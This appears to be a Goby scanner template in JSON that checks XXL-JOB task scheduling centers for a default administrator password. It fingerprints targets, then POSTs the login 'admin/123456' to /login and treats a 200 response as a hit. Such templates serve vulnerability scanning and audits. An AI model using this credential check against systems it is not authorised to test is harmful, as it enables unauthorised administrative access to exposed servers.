Goby/json/XXL_JOB_Default_password.json

62 lines
2.4 KiB
JSON

{
"Name": "XXL-JOB Default password",
"Level": "2",
"Tags": [
"Default password"
],
"GobyQuery": "(app=\"XXL-JOB\" || title=\"任务调度中心\")",
"Description": "There is a default weak password in the background of xxl-job task scheduling center, so attackers can further attack in the background",
"Product": "XXL-JOB",
"Homepage": "https://www.xuxueli.com/xxl-job/",
"Author": "PeiQi",
"Impact": "<p>Attackers can further attack in the background<br></p>",
"Recommandation": "",
"References": [
"http://wiki.peiqi.tech"
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/login",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
},
"data_type": "text",
"data": "userName=admin&password=123456"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "not contains",
"value": "500",
"bz": ""
}
]
},
"SetVariable": []
}
],
"PostTime": "2021-04-04 22:53:01",
"GobyVersion": "1.8.255"
}